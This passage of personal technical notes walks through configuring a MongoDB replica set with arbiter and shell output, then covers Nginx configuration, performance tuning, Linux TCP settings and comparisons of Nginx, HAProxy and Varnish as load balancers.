To proceed, you need to configure the replica set. Do so by first connecting to one of the non-arbiter mongods just started. Connect, and then run the rs.initiate() command:

omidraha@debian:~$ mongo --port 4000
> rs.status()
{
    "startupStatus" : 3,
    "info" : "run rs.initiate(...) if not yet done for the set",
    "ok" : 0,
    "errmsg" : "can't get local.system.replset config from self or any seed (EMPTYCONFIG)"
}
> rs.initiate()
{
    "info2" : "no configuration explicitly specified -- making one",
    "me" : "debian:4000",
    "info" : "Config now saved locally. Should come online in about a minute.",
    "ok" : 1
}

mongo node1 log:

Sun Jul 14 10:11:02.875 [conn2] replSet replSetInitiate admin command received from client
Sun Jul 14 10:11:02.877 [conn2] replSet info initiate : no configuration specified. Using a default configuration for the set
Sun Jul 14 10:11:02.877 [conn2] replSet created this configuration for initiation : { _id: "myapp", members: [ { _id: 0, host: "debian:4000" } ] }
Sun Jul 14 10:11:02.877 [conn2] replSet replSetInitiate config object parses ok, 1 members specified
Sun Jul 14 10:11:02.878 [conn2] replSet replSetInitiate all members seem up
Sun Jul 14 10:11:02.878 [conn2] ******
Sun Jul 14 10:11:02.878 [conn2] creating replication oplog of size: 50MB...
Sun Jul 14 10:11:02.878 [FileAllocator] allocating new datafile /data/mongo-sample/node1/local.1, filling with zeroes...
Sun Jul 14 10:11:02.923 [FileAllocator] done allocating datafile /data/mongo-sample/node1/local.1, size: 64MB, took 0.044 secs
Sun Jul 14 10:11:03.068 [conn2] ******
Sun Jul 14 10:11:03.068 [conn2] replSet info saving a newer config version to local.system.replset
Sun Jul 14 10:11:03.168 [conn2] replSet saveConfigLocally done
Sun Jul 14 10:11:03.168 [conn2] replSet replSetInitiate config now saved locally. Should come online in about a minute.
Sun Jul 14 10:11:03.168 [conn2] command admin.$cmd command: { replSetInitiate: undefined } ntoreturn:1 keyUpdates:0 locks(micros) W:291798 reslen:195 292ms
Sun Jul 14 10:11:05.765 [rsStart] replSet I am debian:4000
Sun Jul 14 10:11:05.766 [rsStart] replSet STARTUP2
Sun Jul 14 10:11:06.767 [rsSync] replSet SECONDARY
Sun Jul 14 10:11:06.767 [rsMgr] replSet info electSelf 0
Sun Jul 14 10:11:07.767 [rsMgr] replSet PRIMARY
Sun Jul 14 10:12:48.733 [conn2] replSet replSetReconfig config object parses ok, 2 members specified
Sun Jul 14 10:12:48.734 [conn2] replSet replSetReconfig [2]
Sun Jul 14 10:12:48.734 [conn2] replSet info saving a newer config version to local.system.replset
Sun Jul 14 10:12:48.807 [conn2] replSet saveConfigLocally done
Sun Jul 14 10:12:48.808 [conn2] replSet info : additive change to configuration
Sun Jul 14 10:12:48.808 [conn2] replSet replSetReconfig new config saved locally

Within a minute or so, you'll have a one-member replica set. You can now add the other two members using rs.add():

myapp:PRIMARY> rs.add("debian:4001")
{ "ok" : 1 }

mongo node1 log:


Sun Jul 14 10:12:48.808 [conn2] replSet info : additive change to configuration
Sun Jul 14 10:12:48.808 [conn2] replSet replSetReconfig new config saved locally
Sun Jul 14 10:12:48.809 [rsHealthPoll] replSet member debian:4001 is up
Sun Jul 14 10:12:48.809 [rsMgr] replSet total number of votes is even - add arbiter or give one member an extra vote
Sun Jul 14 10:12:58.049 [initandlisten] connection accepted from 127.0.0.1:40047 #3 (2 connections now open)
Sun Jul 14 10:12:58.811 [rsHealthPoll] replset info debian:4001 thinks that we are down
Sun Jul 14 10:12:58.811 [rsHealthPoll] replSet member debian:4001 is now in state STARTUP2
Sun Jul 14 10:13:14.277 [initandlisten] connection accepted from 127.0.0.1:40050 #4 (3 connections now open)
Sun Jul 14 10:13:14.434 [conn4] end connection 127.0.0.1:40050 (2 connections now open)
Sun Jul 14 10:13:14.815 [rsHealthPoll] replSet member debian:4001 is now in state RECOVERING
Sun Jul 14 10:13:15.117 [initandlisten] connection accepted from 127.0.0.1:40051 #5 (3 connections now open)
Sun Jul 14 10:13:15.434 [initandlisten] connection accepted from 127.0.0.1:40052 #6 (4 connections now open)
Sun Jul 14 10:13:16.451 [slaveTracking] build index local.slaves { _id: 1 }
Sun Jul 14 10:13:16.453 [slaveTracking] build index done. scanned 0 total records. 0.001 secs
Sun Jul 14 10:13:16.816 [rsHealthPoll] replSet member debian:4001 is now in state SECONDARY

Next, add the arbiter, again using rs.add():

myapp:PRIMARY> rs.add("debian:4002", {arbiterOnly: true})
{ "ok" : 1 }

mongo node1 log:

Sun Jul 14 10:18:14.555 [conn2] replSet info : additive change to configuration
Sun Jul 14 10:18:14.555 [conn2] replSet replSetReconfig new config saved locally
Sun Jul 14 10:18:14.557 [rsHealthPoll] replSet member debian:4002 is up
Sun Jul 14 10:18:21.957 [initandlisten] connection accepted from 127.0.0.1:36193 #17 (5 connections now open)
Sun Jul 14 10:18:22.559 [rsHealthPoll] replset info debian:4002 thinks that we are down
Sun Jul 14 10:18:22.559 [rsHealthPoll] replSet member debian:4002 is now in state STARTUP2
Sun Jul 14 10:18:24.559 [rsHealthPoll] replSet member debian:4002 is now in state ARBITER

Note that for this second added node, you specify the arbiterOnly option to create an arbiter. Within a minute, all members should be online:

myapp:PRIMARY> db.isMaster()
{
    "setName" : "myapp",
    "ismaster" : true,
    "secondary" : false,
    "hosts" : [
        "debian:4000",
        "debian:4001"
    ],
    "arbiters" : [
        "debian:4002"
    ],
    "primary" : "debian:4000",
    "me" : "debian:4000",
    "maxBsonObjectSize" : 16777216,
    "maxMessageSizeBytes" : 48000000,
    "localTime" : ISODate("2013-07-14T07:00:21.925Z"),
    "ok" : 1
}

A more detailed view of the system is provided by the rs.status() method. You'll see state information for each node. Here's the complete status listing:

myapp:PRIMARY> rs.status()
{
    "set" : "myapp",
    "date" : ISODate("2013-07-14T07:07:01Z"),
    "myState" : 1,
    "members" : [
        {
            "_id" : 0,
            "name" : "debian:4000",
            "health" : 1,
            "state" : 1,
            "stateStr" : "PRIMARY",
            "uptime" : 466,
            "optime" : { "t" : 1373780894, "i" : 1 },
            "optimeDate" : ISODate("2013-07-14T05:48:14Z"),
            "self" : true
        },
        {
            "_id" : 1,
            "name" : "debian:4001",
            "health" : 1,
            "state" : 2,
            "stateStr" : "SECONDARY",
            "uptime" : 458,
            "optime" : { "t" : 1373780894, "i" : 1 },
            "optimeDate" : ISODate("2013-07-14T05:48:14Z"),
            "lastHeartbeat" : ISODate("2013-07-14T07:06:59Z"),
            "lastHeartbeatRecv" : ISODate("2013-07-14T07:07:00Z"),
            "pingMs" : 0,
            "syncingTo" : "debian:4000"
        },
        {
            "_id" : 2,
            "name" : "debian:4002",
            "health" : 1,
            "state" : 7,
            "stateStr" : "ARBITER",
            "uptime" : 454,
            "lastHeartbeat" : ISODate("2013-07-14T07:06:59Z"),
            "lastHeartbeatRecv" : ISODate("2013-07-14T07:07:01Z"),
            "pingMs" : 0
        }
    ],
    "ok" : 1
}

Unless your MongoDB database contains a lot of data, the replica set should come online within 30 seconds. During this time, the stateStr field of each node should transition from RECOVERING to PRIMARY, SECONDARY, or ARBITER.

35.7.4 Cmds

use admin
db.shutdownServer()
db.getReplicationInfo()
db.oplog.rs.find().sort({$natural: -1})

http://docs.mongodb.org/manual/core/replica-set-elections/#optime
A replica set member cannot become primary unless it has the highest (i.e. most recent) optime of any visible member in the set.

http://docs.mongodb.org/manual/reference/glossary/
http://docs.mongodb.org/manual/reference/glossary/#term-eventual-consistency
A property of a distributed system that allows changes to the system to propagate gradually. In a database system, this means that readable members are not required to reflect the latest writes at all times. In MongoDB, reads from a primary have strict consistency; reads from secondaries have eventual consistency.

http://docs.mongodb.org/manual/reference/glossary/#term-strict-consistency
A property of a distributed system requiring that all members always reflect the latest changes to the system. In a database system, this means that any system that can provide data must reflect the latest writes at all times. In MongoDB, reads from a primary have strict consistency; reads from secondary members have eventual consistency.

http://docs.mongodb.org/manual/core/replica-set-sync/#validity-and-durability
In a replica set, only the primary can accept write operations. Writing only to the primary provides strict consistency among members.
Journaling provides single-instance write durability. Without journaling, if a MongoDB instance terminates ungracefully, you must assume that the database is in an invalid state.


While applying a batch, MongoDB blocks all reads. As a result, secondaries can never return data that reflects a state that never existed on the primary.

35.8 Locks

35.8.1 Path of mongodb lock

/var/lib/mongodb/mongod.lock

35.9 Forks

35.9.1 tokumx

http://www.tokutek.com/products/tokumx-for-mongodb/
http://www.tokutek.com/2013/06/announcing-tokumx-v1-0-tokumongo-you-can-have-it-all-2/
http://www.tokutek.com/2013/07/how-tokumx-gets-great-compression-for-mongodb/

35.10 Tools

35.10.1 mongosniff

http://docs.mongodb.org/manual/reference/program/mongosniff/

Use the following command to connect to a mongod or mongos running on port 27017 and 27018 on the localhost interface:

mongosniff --source NET lo 27017 27018

Use the following command to only log invalid BSON objects for the mongod or mongos running on the localhost interface and port 27018, for driver development and troubleshooting:

mongosniff --objcheck --source NET lo 27018

35.11 Cmds

35.11.1 How can I check the size of a collection?

To view the size of a collection and other information, use the db.collection.stats() method from the mongo shell. The following example issues db.collection.stats() for the orders collection:

db.orders.stats();

To view specific measures of size, use these methods:


db.collection.dataSize()       # data size in bytes for the collection.
db.collection.storageSize()    # allocation size in bytes, including unused space.
db.collection.totalSize()      # the data size plus the index size in bytes.
db.collection.totalIndexSize() # the index size in bytes.

Also, the following scripts print the statistics for each database and collection:

db._adminCommand("listDatabases").databases.forEach(function (d) { mdb = db.getSiblingDB(d.name); printjson(mdb.stats()) })

db._adminCommand("listDatabases").databases.forEach(function (d) { mdb = db.getSiblingDB(d.name); mdb.getCollectionNames().forEach(function(c) { s = mdb[c].stats(); printjson(s) }) })

35.11.2 How can I check the size of indexes?

To view the size of the data allocated for an index, use one of the following procedures in the mongo shell: Use the db.collection.stats() method using the index namespace. To retrieve a list of namespaces, issue the following command:

db.system.namespaces.find()

Check the value of indexSizes in the output of the db.collection.stats() command. Example: Issue the following command to retrieve index namespaces:

db.system.namespaces.find()

The command returns a list similar to the following:

{"name": "test.orders"} {"name": "test.system.indexes"} {"name":"test.orders.$_id_"}

View the size of the data allocated for the orders.$_id_ index with the following sequence of operations:

use test
db.orders.$_id_.stats().indexSizes

35.12 Monitoring

Tuning Mongodb Performance With MMS


CHAPTER 36

Nginx

Contents:

36.1 Tips

36.1.1 Install Module

$ /etc/nginx/sites-enabled/redmine

36.1.2 Change default welcome page of nginx

$ vim /usr/share/nginx/html/index.html

36.1.3 Nginx with Docker

$ docker pull nginx

Expose Ports: 80
Data Directories: /etc/nginx/nginx.conf
https://hub.docker.com/_/nginx/

serve static files

$ docker run --name nx -p 8123:80 -v /home/or/ws/dw/nginx.conf:/etc/nginx/nginx.conf:ro -v /home/or/ws/dw:/usr/share/nginx/html/:ro -d nginx

The nginx.conf file:

user nginx;
worker_processes 1;

error_log /var/log/nginx/error.log warn;
pid /var/run/nginx.pid;

events {
    worker_connections 1024;
}

http {
    include /etc/nginx/mime.types;
    default_type application/octet-stream;

    log_format main '$remote_addr - $remote_user [$time_local] "$request" '
                    '$status $body_bytes_sent "$http_referer" '
                    '"$http_user_agent" "$http_x_forwarded_for"';

    access_log /var/log/nginx/access.log main;

    sendfile on;
    #tcp_nopush on;

    keepalive_timeout 65;

    #gzip on;

    include /etc/nginx/conf.d/*.conf;

    proxy_connect_timeout 600;
    proxy_send_timeout 600;
    proxy_read_timeout 600;
    send_timeout 600;
    client_max_body_size 10m;

    server {
        listen 8123;
        server_name _;
        location / {
            root /usr/share/nginx/html/;
        }
    }
}

36.1.4 Nginx config file

Nginx Full example file:

https://www.nginx.com/resources/wiki/start/topics/examples/full/

36.1.5 Nginx customize error pages

server {
    ...

    # Determines whether proxied responses with codes greater than or equal to 300
    # should be passed to a client or be redirected to nginx for processing with the error_page directive
    proxy_intercept_errors on;

    # 403 error
    error_page 403 /403.html;
    location /403.html {
        # we assumed `403.html` file is there on this root path:
        root /absolute/path/to/errors/folder/;
        # The file is only accessible through internal Nginx redirects (not requestable directly by clients):
        internal;
    }

    # 404 error
    error_page 404 /404.html;
    location /404.html {
        # we assumed `404.html` file is there on this root path:
        root /absolute/path/to/errors/folder/;
        internal;
    }

    # 50x errors
    error_page 500 502 503 504 @error;
    location @error {
        add_header Cache-Control no-cache;
        # we assumed `error.html` file is there on this root path:
        root /absolute/path/to/errors/folder/;
        rewrite ^(.*)$ /error.html break;
    }
} # server block

http://nginx.org/en/docs/http/ngx_http_proxy_module.html#proxy_intercept_errors
http://nginx.org/en/docs/http/ngx_http_core_module.html#error_page

36.1.6 Nginx maintenance mode

server {
    ...

    location / {
        proxy_pass http://web_server;

        # we assumed the `maintenance` file can be touched or removed on this root path:
        if (-e /absolute/path/to/switch/folder/maintenance) {
            error_page 503 @maintenance;
            return 503;
        }
    }

    location @maintenance {
        add_header Cache-Control no-cache;
        root /src/collected_static/errors/;
        rewrite ^(.*)$ /maintenance.html break;
    }
}

# to switch maintenance mode on
$ touch /absolute/path/to/switch/folder/maintenance
# to switch maintenance mode off
$ rm /absolute/path/to/switch/folder/maintenance

https://github.com/spesnova/docker-example-nginx/blob/master/files/nginx.conf

36.1.7 How to restrict access to directory and sub directories

location /st/ {
    autoindex off;
    alias /absolute/path/to/static/folder/;
}

http://nginx.org/en/docs/http/ngx_http_autoindex_module.html

36.1.8 Enable Nginx Status Page

user nginx;
worker_processes 1;

error_log /var/log/nginx/error.log warn;
pid /var/run/nginx.pid;

events {
}

http {
    include /etc/nginx/mime.types;
    default_type application/octet-stream;

    log_format main '$remote_addr - $remote_user [$time_local] "$request" '
                    '$status $body_bytes_sent "$http_referer" '
                    '"$http_user_agent" "$http_x_forwarded_for"';

    server {
        server_name _;
        # Server status
        location = /status {
            stub_status on;
            allow all;
        }
    }
}

36.1.9 Tuning Nginx

This number should be, at maximum, the number of CPU cores on your system, since nginx doesn't benefit from more than one worker per CPU.

worker_processes auto;
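If you prefer an explicit value over auto (older nginx releases do not support auto), a quick sketch for finding the core count on Linux:

# number of available CPU cores; use this value for worker_processes
$ nproc
# equivalent, reading /proc/cpuinfo directly
$ grep -c ^processor /proc/cpuinfo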

epoll is a Linux kernel system call, a scalable I/O event notification mechanism, first introduced in Linux kernel 2.5.44. It is meant to replace the older POSIX select and poll system calls, to achieve better performance in more demanding applications, where the number of watched file descriptors is large (unlike the older system calls, which operate in O(n) time, epoll operates in O(1) time). epoll is similar to FreeBSD's kqueue, in that it operates on a configurable kernel object, exposed as a file descriptor of its own. We'll also set nginx to use epoll to ensure we can handle a large number of connections optimally and direct it to accept multiple connections at the same time. This option is essential on Linux and is optimized to serve many clients with each thread:

use epoll;

Number of file descriptors used for Nginx. This is set in the OS with ulimit -n 200000 or in /etc/security/limits.conf.

worker_rlimit_nofile 200000;
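A sketch of checking and raising that limit for the nginx user; the user name and limit value are assumptions, adjust them to your setup:

# current soft limit for open files in this shell
$ ulimit -n

# make the higher limit permanent for the nginx user (re-login or restart nginx afterwards)
$ echo 'nginx soft nofile 200000' | sudo tee -a /etc/security/limits.conf
$ echo 'nginx hard nofile 200000' | sudo tee -a /etc/security/limits.conf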

Only log critical errors:

error_log /var/log/nginx/error.log crit;

The author of nginx claims that 10,000 idle connections will use only 2.5 MB of memory.

proxy_buffering: This directive controls whether buffering for this context and child contexts is enabled. By default, this is "on".

proxy_buffers: This directive controls the number (first argument) and size (second argument) of buffers for proxied responses. The default is to configure 8 buffers of a size equal to one memory page (either 4k or 8k). Increasing the number of buffers can allow you to buffer more information.

proxy_buffer_size: The initial portion of the response from a backend server, which contains headers, is buffered separately from the rest of the response. This directive sets the size of the buffer for this portion of the response. By default, this will be the same size as proxy_buffers, but since this is used for header information, this can usually be set to a lower value.

proxy_busy_buffers_size: This directive sets the maximum size of buffers that can be marked "client-ready" and thus busy. While a client can only read the data from one buffer at a time, buffers are placed in a queue to send to the client in bunches. This directive controls the size of the buffer space allowed to be in this state.

proxy_max_temp_file_size: This is the maximum size, per request, for a temporary file on disk. These are created when the upstream response is too large to fit into a buffer.

proxy_temp_file_write_size: This is the amount of data Nginx will write to the temporary file at one time when the proxied server's response is too large for the configured buffers.

proxy_temp_path: This is the path to the area on disk where Nginx should store any temporary files when the response from the upstream server cannot fit into the configured buffers.

As you can see, Nginx provides quite a few different directives to tweak the buffering behavior. Most of the time, you will not have to worry about the majority of these, but it can be useful to adjust some of these values. Probably the most useful to adjust are the proxy_buffers and proxy_buffer_size directives.

In contrast, if you have fast clients that you want to immediately serve data to, you can turn buffering off completely. Nginx will actually still use buffers if the upstream is faster than the client, but it will immediately try to flush data to the client instead of waiting for the buffer to pool. If the client is slow, this can cause the upstream connection to remain open until the client can catch up. When buffering is "off" only the buffer defined by the proxy_buffer_size directive will be used.

http://stackoverflow.com/questions/7325211/tuning-nginx-worker-process-to-obtain-100k-hits-per-min
https://rwebs.ca/attempt-at-optimizing-digital-ocean-install-with-loader-io/
https://blog.martinfjordvald.com/2011/04/optimizing-nginx-for-high-traffic-loads/
http://www.freshblurbs.com/blog/2015/11/28/high-load-nginx-config.html
https://www.digitalocean.com/community/tutorials/understanding-nginx-http-proxying-load-balancing-buffering-and-caching
https://www.maxcdn.com/blog/nginx-application-performance-optimization/
https://nelsonslog.wordpress.com/2013/05/19/nginx-proxy-buffering/

worker_connections

Determines how many clients will be served by each worker process.
Max clients = worker_connections * worker_processes
Max clients is also limited by the number of socket connections available on the system (~64k).

worker_connections 1024;

Accept as many connections as possible, after nginx gets notification about a new connection. May flood worker_connections, if that option is set too low. It should be kept in mind that this number includes all connections (e.g. connections with proxied servers, among others), not only connections with clients. Another consideration is that the actual number of simultaneous connections cannot exceed the current limit on the maximum number of open files, which can be changed by worker_rlimit_nofile.

multi_accept on;

Since we will likely have a few static assets on the file system, like logos, CSS files, Javascript, etc., that are commonly used across your site, it's quite a bit faster to have nginx cache these for short periods of time. Adding this outside of the events block tells nginx to cache 1000 files for 30 seconds, excluding any files that haven't been accessed in 20 seconds, and only files that have been used 5 times or more. If you aren't deploying frequently you can safely bump up these numbers higher. This caches information about open FDs and frequently accessed files. Changing this setting, in my environment, brought performance up from 560k req/sec to 904k req/sec. I recommend using some variant of these options, though not necessarily the specific values listed below.

open_file_cache max=1000 inactive=20s;
open_file_cache_valid 30s;
open_file_cache_min_uses 5;
open_file_cache_errors off;


Buffer log writes to speed up IO, or disable them altogether:

access_log off;
#access_log /var/log/nginx/access.log main buffer=16k;

Since we're now set up to handle lots of connections, we should allow browsers to keep their connections open for a while so they don't have to reconnect as often. This is controlled by the keepalive_timeout setting. We're also going to turn on sendfile support, tcp_nopush, and tcp_nodelay. sendfile optimizes serving static files from the file system, like your logo. The other two optimize nginx's use of TCP for headers and small bursts of traffic for things like Socket IO or frequent REST calls back to your site. sendfile copies data between one FD and another from within the kernel. It is more efficient than read() + write(), since that requires transferring data to and from user space.

sendfile on;

tcp_nopush causes nginx to attempt to send its HTTP response head in one packet, instead of using partial frames. This is useful for prepending headers before calling sendfile, or for throughput optimization.

tcp_nopush on;

Don't buffer data-sends (disable the Nagle algorithm). Good for sending frequent small bursts of data in real time.

tcp_nodelay on;

Timeout for keep-alive connections. The server will close connections after this time.

keepalive_timeout 15;

Number of requests a client can make over the keep-alive connection. This is set high for testing.

keepalive_requests 100000;

Allow the server to close the connection after a client stops responding. Frees up socket-associated memory.

reset_timedout_connection on;

Send the client a "request timed out" if the body is not loaded by this time. Default 60.

client_body_timeout 10;

If the client stops reading data, free up the stale client connection after this much time. Default 60.

send_timeout 2;

Nearly every browser on earth supports receiving compressed content, so we definitely want to turn that on. These also go in the same http section as above. Compression reduces the amount of data that needs to be transferred over the network:

gzip on;
gzip_min_length 1000;
gzip_types text/plain text/css text/xml text/javascript application/json application/x-javascript application/xml application/xml+rss;
gzip_proxied expired no-cache no-store private auth;
gzip_disable "MSIE [1-6]\.";


One of the first things that many people try to do is to enable the gzip compression module available with nginx. The intention here is that the objects which the server sends to requesting clients will be smaller, and thus faster to send. However this involves the trade-off common to tuning: performing the compression takes CPU resources from your server, which frequently means that you'd be better off not enabling it at all. Generally the best approach with compression is to only enable it for large files, and to avoid compressing things that are unlikely to be reduced in size (such as images, executables, and similar binary files). With that in mind the following is a sensible configuration:

gzip on;
gzip_vary on;
gzip_min_length 10240;
gzip_proxied expired no-cache no-store private auth;
gzip_types text/plain text/css text/xml text/javascript application/x-javascript application/xml;
gzip_disable "MSIE [1-6]\.";
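To check that compression is actually being applied, you can request a gzip-encoded response with curl and look at the Content-Encoding header; the URL below is just a placeholder for your own server:

# -D - dumps the response headers; a compressed response includes "Content-Encoding: gzip"
$ curl -s -H 'Accept-Encoding: gzip' -D - -o /dev/null http://127.0.0.1/ | grep -i '^content-encoding'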

This enables compression for files that are over 10k, aren't being requested by early versions of Microsoft's Internet Explorer, and only attempts to compress text-based files.

https://tweaked.io/guide/nginx/

proxy_buffering is turned on by default with nginx, so we just need to bump up the sizes of these buffers. The first directive, proxy_buffers, is telling nginx to create and use 8 24k buffers for the response from the proxy. The second directive is a special smaller buffer that will just contain the HEAD information, so it's safe to make that smaller.

So what does this do? When you're proxying a connection, nginx is playing the middle man between the browser and your WSGI process. As the WSGI process writes data back to nginx, nginx stores this in a buffer and writes out to the client browser when the buffer is full. If we leave these at the defaults nginx provides (8 buffers of either 4 or 8K depending on the system), what ends up happening is our big 50-200K of HTML markup is spoon fed to nginx in small 4K bites and then sent out to the browser. This is sub-optimal for most sites. What we want to have happen is for our WSGI process to finish and move on to the next request as fast as possible. To do this it needs nginx to slurp up all of the output quickly. Increasing the buffer sizes to be larger than most (or all) of the markup size of your app's pages lets this happen.

location / {
    proxy_buffers 8 24k;
    proxy_buffer_size 2k;
    proxy_pass http://127.0.0.1:8000;
}

http://www.revsys.com/12days/nginx-tuning/
http://dak1n1.com/blog/12-nginx-performance-tuning/

How to Optimize NGINX to Handle 100+K Requests per Minute http://tecadmin.net/optimize-nginx-to-handle-100k-requests-per-minute/

36.1.10 Load testing

Load and stress testing, as defined by Wikipedia: "Load testing is the process of putting demand on a system or device and measuring its response. Stress testing refers to tests that determine the robustness of software by testing beyond the limits of normal operation."

https://en.wikipedia.org/wiki/Load_testing

https://en.wikipedia.org/wiki/Stress_testing_%28software%29
http://www.devcurry.com/2010/07/10-free-tools-to-loadstress-test-your.html
http://dak1n1.com/blog/14-http-load-generate/
https://luoluca.wordpress.com/2015/05/24/docker-up-distributed-load-testing-with-tsung/

36.1.11 JMeter

https://www.digitalocean.com/community/tutorials/how-to-use-jmeter-to-record-test-scenarios
https://gist.github.com/hhcordero/abd1dcaf6654cfe51d0b
http://srivaths.blogspot.com/2014/08/distrubuted-jmeter-testing-using-docker.html
https://github.com/hauptmedia/docker-jmeter
https://docs.google.com/presentation/d/1Yi5C27C3Q0AnT-uw9SRnMeEqXSKLQ8h9O9Jqo1gQiyI/edit?pref=2&pli=1#slide=id.g2a7b2c954_016
https://www.digitalocean.com/community/tutorial_series/load-testing-with-apache-jmeter
https://www.digitalocean.com/community/tutorials/how-to-use-apache-jmeter-to-perform-load-testing-on-a-web-server

36.1.12 Linux TCP/IP tuning for scalability

Concurrent User Connections

If your implementation is creating a large number of concurrent user connections to backend application servers, it is important to verify that there are enough local port numbers available for outbound connections to the backend application. Verification of the server port range can be done using the following command:

$ sysctl net.ipv4.ip_local_port_range

If the range needs to be increased, that can be done using the following command:

$ sudo sysctl -w net.ipv4.ip_local_port_range="1024 64000"

http://www.lognormal.com/blog/2012/09/27/linux-tcpip-tuning/
http://stackoverflow.com/questions/1575453/how-many-socket-connections-can-a-web-server-handle
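The sysctl -w change is lost on reboot; a small sketch for making it persistent (same key and value as in the example above):

# persist the wider ephemeral port range across reboots
$ echo 'net.ipv4.ip_local_port_range = 1024 64000' | sudo tee -a /etc/sysctl.conf
# reload all settings from /etc/sysctl.conf
$ sudo sysctl -p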

36.1.13 What is a Reverse Proxy vs. Load Balancer?

A reverse proxy accepts a request from a client, forwards it to a server that can fulfill it, and returns the server’s response to the client. A load balancer distributes incoming client requests among a group of servers, in each case returning the response from the selected server to the appropriate client.

Load Balancing

Load balancers are most commonly deployed when a site needs multiple servers because the volume of requests is too much for a single server to handle efficiently. Deploying multiple servers also eliminates a single point of failure, making the website more reliable. Most commonly, the servers all host the same content, and the load balancer’s job is to distribute the workload in a way that makes the best use of each server’s capacity, prevents overload on any server, and results in the fastest possible response to the client.


A load balancer can also enhance the user experience by reducing the number of error responses the client sees. It does this by detecting when servers go down, and diverting requests away from them to the other servers in the group. In the simplest implementation, the load balancer detects server health by intercepting error responses to regular requests. Application health checks are a more flexible and sophisticated method in which the load balancer sends separate health-check requests and requires a specified type of response to consider the server healthy. Another useful function provided by some load balancers is session persistence, which means sending all requests from a particular client to the same server. Even though HTTP is stateless in theory, many applications must store state information just to provide their core functionality – think of the shopping basket on an e-commerce site. Such applications underperform or can even fail in a load-balanced environment, if the load balancer distributes requests in a user session to different servers instead of directing them all to the server that responded to the initial request.

Nginx with dynamic upstreams

https://tenzer.dk/nginx-with-dynamic-upstreams/
https://www.nginx.com/products/on-the-fly-reconfiguration/
https://github.com/GUI/nginx-upstream-dynamic-servers
https://github.com/cubicdaiya/ngx_dynamic_upstream
http://serverfault.com/questions/374643/nginx-dynamic-upstream-configuration-routing
https://github.com/Mashape/kong/issues/1129
https://news.ycombinator.com/item?id=9950715
https://github.com/bobrik/zoidberg-nginx
https://github.com/bobrik/zoidberg
https://github.com/openresty/lua-resty-dns
https://github.com/spro/simon

Reverse Proxy

Whereas deploying a load balancer makes sense only when you have multiple servers, it often makes sense to deploy a reverse proxy even with just one web server or application server. You can think of the reverse proxy as a website's "public face." Its address is the one advertised for the website, and it sits at the edge of the site's network to accept requests from web browsers and mobile apps for the content hosted at the website. The benefits are two-fold:

Increased security: No information about your backend servers is visible outside your internal network, so malicious clients cannot access them directly to exploit any vulnerabilities. Many reverse proxy servers include features that help protect backend servers from distributed denial-of-service (DDoS) attacks, for example by rejecting traffic from particular client IP addresses (blacklisting), or limiting the number of connections accepted from each client.

Increased scalability and flexibility: Because clients see only the reverse proxy's IP address, you are free to change the configuration of your backend infrastructure. This is particularly useful in a load-balanced environment, where you can scale the number of servers up and down to match fluctuations in traffic volume.

Another reason to deploy a reverse proxy is for web acceleration, reducing the time it takes to generate a response and return it to the client. Techniques for web acceleration include the following:


Compression: Compressing server responses before returning them to the client (for instance, with gzip) reduces the amount of bandwidth they require, which speeds their transit over the network.

SSL termination: Encrypting the traffic between clients and servers protects it as it crosses a public network like the Internet. But decryption and encryption can be computationally expensive. By decrypting incoming requests and encrypting server responses, the reverse proxy frees up resources on backend servers which they can then devote to their main purpose, serving content.

Caching: Before returning the backend server's response to the client, the reverse proxy stores a copy of it locally. When the client (or any client) makes the same request, the reverse proxy can provide the response itself from the cache instead of forwarding the request to the backend server. This both decreases response time to the client and reduces the load on the backend server.

https://www.nginx.com/resources/glossary/reverse-proxy-vs-load-balancer/

36.1.14 Load balancing haproxy and nginx

Understanding Load Balancing

Load balancing, otherwise known as fault-tolerant proxying, helps to disseminate requests going into one domain across multiple web servers, where they access the stored data requested by clients. The main objective of load balancing is to avoid having a single point of failure, so that no part of the system is important enough that if it fails the system will crash.

HAproxy was built to alleviate these concerns as a fast, reliable and free load balancer proxy for TCP and HTTP based applications. It is written in the C programming language with a single-process, event-driven model that was designed to reduce the cost of context switches and memory usage. Other systems that use pre-forked or threaded servers use more memory, but HAproxy can process several hundreds of tasks in as fast as a millisecond.

Modes: TCP vs. HTTP

What makes HAproxy so efficient as a load balancer is its ability to perform Layer 4 load balancing. In TCP mode, all user traffic will be forwarded based on IP range and port. The user accesses the load balancer, which will forward the request to the backend servers. The backend server that is selected will then respond directly to the user, which streamlines the process.

The other form of load balancing is Layer 7, or HTTP load balancing, which forwards the requests to different backend servers based on the content of the user's request. This mode is more commonly used when running multiple application servers under the same domain and port, because it inspects the content of the request in order to sort it. While HTTP mode is good for sorting, TCP mode is ideal for speed since it doesn't have to open the package to sort the requests. Unlike a lot of other load balancers, HAproxy is unique because it has both options built in.

Nginx                  | HAproxy
-----------------------+-------------------------------------
Full Web Server        | Only Load Balancer
Complicated, Slower    | Faster
Works with Windows     | Only Open Source
No Admin Console       | Admin Console
Only HTTP (Layer 7)    | TCP (Layer 4) and HTTP (Layer 7)
Good Caching           | Advanced Routing and Load Balancing
Native SSL             | Native SSL

HAProxy is really just a load balancer/reverse proxy. Nginx is a Webserver that can also function as a reverse proxy.


Here are some differences:

HAProxy:
Does TCP as well as HTTP proxying (SSL added from 1.5-dev12)
More rate limiting options
The author answers questions here on Server Fault ;-)

Nginx:
Supports SSL directly
Is also a caching server

At Stack Overflow we mainly use HAProxy with nginx for SSL offloading, so HAProxy is my recommendation.

If needed only for load balancing, HAProxy is better. But combining both nginx and HAProxy can be more useful: nginx is fast at providing static content, so it serves all requests for static data and then sends the remaining requests to HAProxy, which acts as a load balancer and forwards requests to the web servers by balancing the load.

HAProxy is the best opensource loadbalancer on the market. Varnish is the best opensource static file cacher on the market. Nginx is the best opensource webserver on the market. (Of course this is my and many other people's opinion.) But generally not all queries go through the entire stack. Everything goes through haproxy and nginx/multiple nginx's. The only difference is you "bolt" on varnish for static requests:
any request is loadbalanced for redundancy and throughput (good, that's scalable redundancy)
any request for static files first hits the varnish cache (good, that's fast)
any dynamic request goes direct to the backend (great, varnish doesn't get used)
Overall, this model fits a scalable and growing architecture (take haproxy out if you don't have multiple servers). Note: I actually also introduce Pound for SSL queries as well. You can have a server dedicated to decrypting SSL requests, and passing out standard requests to the backend stack. (It makes the whole stack run quicker and simpler.)

Nginx:
A full web server; other features can also be used, e.g. HTTP compression and SSL support
Very light weight, as Nginx was designed to be light from the start
Near Varnish caching performance
Close to HAProxy load balancing performance

Varnish:
Best for complex caching scenarios and incorporating with the applications
Best static file cacher
No SSL support
Memory and CPU eater

Haproxy:
Best loadbalancer, with cutting edge load balancing features, comparable to hardware loadbalancers
SSL is supported since 1.5.0
